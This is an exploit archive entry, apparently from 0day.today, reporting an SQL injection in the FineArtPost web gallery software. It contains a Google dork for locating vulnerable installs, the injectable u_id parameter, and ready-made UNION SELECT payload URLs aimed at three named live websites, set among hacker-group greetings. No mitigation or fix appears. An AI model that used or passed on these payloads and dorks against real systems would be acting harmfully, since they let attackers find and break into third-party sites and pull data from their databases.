FineArtPost <= SQL injection Vulnerabelity

🗓️ 29 May 2011 00:00:00Reported by Caddy-DzType
zdt🔗 0day.today👁 20 Views
FineArtPost SQL Injection Vulnerabilit
=================================================================================
                      .__         .__  __            .__    .___

  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ | 
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ | 

 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ | 
     \/      \/|__|                                          \/ 
 
			Exploit-ID is the Indonesian Exploit Archive
 
Web             : exploit-id.com	

e-mail          : root[at]exploit-id.com               

                      #########################################
                       I'm Caddy-Dz ,  member from exploit-id.com

                      #########################################			  
================================================================================
####
# Exploit Title: FineArtPost <= SQL injection Vulnerabelity
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: [email protected]  |  [email protected]
# Category:: webapps
# Google Dork: intext:"powered by FineArtPost" inurl:u_id
# Tested on: [Windows Vista Edition IntÃ©grale]
####

||> Special Greeting To: KedAns-Dz & All Algerians Hackers

####


[*] ## ExPLo!T: 

http://127.0.0.1/[Path]/*.php?user_id=2&u_id=44&user_id=2&large=yes   /  ==> /  http://127.0.0.1/*.php?user_id=2&u_id=44[Inject Here]

http://127.0.0.1/*.php?user_id=2&u_id=[SQLI]

http://127.0.0.1/[Path]/*.php?user_id=2&u_id=[SQLI]


####


[*]## Demo:

http://www.artisanwoodsgallery.com/public/display_images.php?user_id=2&u_id=-44%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

http://www.fineartpost.com/zaluchapost/public/display_images.php?u_id=-193%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

http://www.mcaseyart.com/public/view_text.php?t_id=7&u_id=-36%20union%20select%201,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69--

####

Peace From Algeria

####

||> Exploit-id will not die

=================================**Algerians Hackers**=======================================
# Greets To : 
  KedAns-Dz & **All Algerians Hackers** , jos_ali_joe , All Exploit-Id Team ,  (exploit-id.com) 
  (1337day.com) , (09exploit.com) , All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer ,
   MaaTar , St0fa , Nissou , RmZ ...others
============================================================================================



#  0day.today [2018-03-19]  #
29 May 2011 00:00Current
7.1High risk
Vulners AI Score7.1